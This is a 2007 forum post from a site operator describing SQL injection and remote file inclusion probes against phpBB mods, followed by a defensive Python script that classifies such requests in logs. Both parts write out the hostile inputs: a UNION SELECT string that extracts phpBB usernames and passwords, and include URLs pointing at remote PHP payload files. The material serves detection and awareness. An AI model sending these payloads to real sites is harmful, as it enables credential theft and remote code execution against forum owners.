Dan
Posted: Wed Oct 17, 2007 2:24 am
Post subject: New phpBB Virus?
I have been tracking an increase in phpBB exploit attempts on compsci.ca (they obviously fail, since there is not much left of phpBB below the look of the site). At first I thought it was just an increase of script kiddies using tools to randomly try to hack phpBB-based sites, but the more I look into it the more it looks like a new phpBB virus is out there. Almost all the attacks come from completely different IPs from all over the world, yet they all share a lot of common elements. Mainly, they all target phpBB mods or add-ons rather than the core phpBB code. So far I have seen them concentrate on the hierarchy mod, the links page mod and the image gallery mod. There are two main types of attacks, which I will describe below:
SQL Injection:
The attacker sends a string like %2%200UNION%20SELECT%201,username,user_password,4,5,6,7%20,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_%20id=2/* to the start URI variable in links.php. (BTW, don't go to this page on compsci.ca or it may auto-ban you.)
Messed up File Injection?:
This one I do not understand at all, and it is now even more common than the SQL injection one. Instead of sending a SQL line to a URI variable, they send a URL to a txt file. This txt file contains some PHP code which is normally about the same, give or take a few lines, but oddly it is hosted on hundreds of different servers around the world, and they all seem to be servers for real, credible sites, which is why I think this is a new virus. Also, they do not seem to concentrate on one individual PHP page or variable like the SQL injection does, and they seem to randomly try all different kinds.
Such a request looks something like: index.php?h=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&pf=14 (BTW, don't go to this page on compsci.ca or it may auto-ban you)
or: index.php?h=http://usuarios.arnet.com.ar/larry123/safe.txt (this one seems to have been removed from the infected server; still, don't go to this link on compsci.ca or you will be auto-banned)
I really don't get how this attack is supposed to work, unless people make a habit of including and running code they got from strings in the URI variable.
Also, what makes this more disturbing is that the attacks seem to change slightly every few days, as if they are almost getting better, like this is a trojan virus of some kind and someone is changing the attacks every so often.
As I said above, compsci.ca is not affected by these hacks, though they do increase traffic. My concern is mostly for the poor phpBB users out there who have not changed much of their code. Even if newer versions of phpBB are not affected by this, the traffic generated by these attacks could hurt forums on shared servers. I guess the best idea for people starting up forums might be to simply avoid phpBB, or at the very least avoid phpBB mods that are of poor quality (most of them). If anyone has any more info on this virus/attacks, let me know, especially how putting a string to a txt file is supposed to work.
Once again, do not try the above SQL or file (whatever) injection on compsci.ca: it will not work, and it will bring up a message about you trying to hack the site and put your IP on a list to be banned.
Edit: This is definitely not Santy.A, which was a phpBB virus that spread using Google a few years ago.
Computer Science Canada
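The two request shapes described in the post, as an added example (not code from the original post, from phpBB or from compsci.ca): a small Python classifier that separates UNION-based SQL injection probes from remote file inclusion (RFI) probes in request paths of the kind quoted above. The second shape is RFI: a parameter whose value is itself a URL only does anything against a script that hands that parameter straight to include() or require() on a server where PHP is allowed to open URLs, which matches the guess in the post about "including and running code they got from strings in the URI variable". The sample request paths below are constructed to follow the post's examples (the first three) plus a double-encoded variant and two ordinary requests; the parameter names and the summary format are assumptions of this example.

```python
"""Classify phpBB-style probe requests as UNION-based SQL injection or remote
file inclusion (RFI), e.g. when reading them out of web-server access logs.
Added example; the request strings are constructed after the post's quotes."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# "UNION SELECT" (optionally "UNION ALL SELECT") anywhere in a decoded value.
# No leading \b on purpose: the quoted payload reads "0UNION SELECT", and a
# word boundary before "UNION" would miss it.
SQLI_RE = re.compile(r"union\s+(?:all\s+)?select\b", re.IGNORECASE)
# A value that is itself an absolute URL: the shape of an RFI attempt against
# code that passes the parameter to include()/require().
RFI_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample request paths (the first three follow the post's examples).
SAMPLE_REQUESTS = [
    "/links.php?start=%2%200UNION%20SELECT%201,username,user_password,4,5,6,7"
    "%20,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_%20id=2/*",
    "/index.php?h=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&pf=14",
    "/index.php?h=http://usuarios.arnet.com.ar/larry123/safe.txt",
    # double-encoded variant of the first payload (constructed)
    "/links.php?start=1%2520UNION%2520SELECT%25201",
    # ordinary forum traffic (constructed)
    "/viewtopic.php?t=1234&start=15",
    "/index.php?h=about",
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded payloads are inspected in their final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(request_path):
    """Return [(parameter, kind), ...] with kind "sqli" or "rfi" for one
    request path such as "/links.php?start=...". Empty list: nothing matched."""
    findings = []
    query = urlsplit(request_path).query
    # parse_qsl already performs one round of percent-decoding per value.
    for name, raw_value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw_value)
        if SQLI_RE.search(value):
            findings.append((name, "sqli"))
        elif RFI_RE.search(value):
            findings.append((name, "rfi"))
    return findings


def summarize(request_paths):
    """Count requests per kind; a request counts once per kind it matched,
    and as "clean" if it matched nothing."""
    counts = {"sqli": 0, "rfi": 0, "clean": 0}
    for path in request_paths:
        kinds = {kind for _, kind in classify_request(path)}
        if not kinds:
            counts["clean"] += 1
        for kind in kinds:
            counts[kind] += 1
    return counts


if __name__ == "__main__":
    for path in SAMPLE_REQUESTS:
        print(classify_request(path) or "clean", "<-", path)
    print(summarize(SAMPLE_REQUESTS))
```

The matching is done on the decoded parameter value rather than on the raw request line, and decoding is repeated until it stabilises, because a "%2520"-style double-encoded payload would otherwise slip past a pattern that looks for a literal "UNION SELECT". Anything that feeds an auto-ban list should also rate-limit by source IP rather than banning on a single hit, since the post notes the requests arrive from many unrelated addresses.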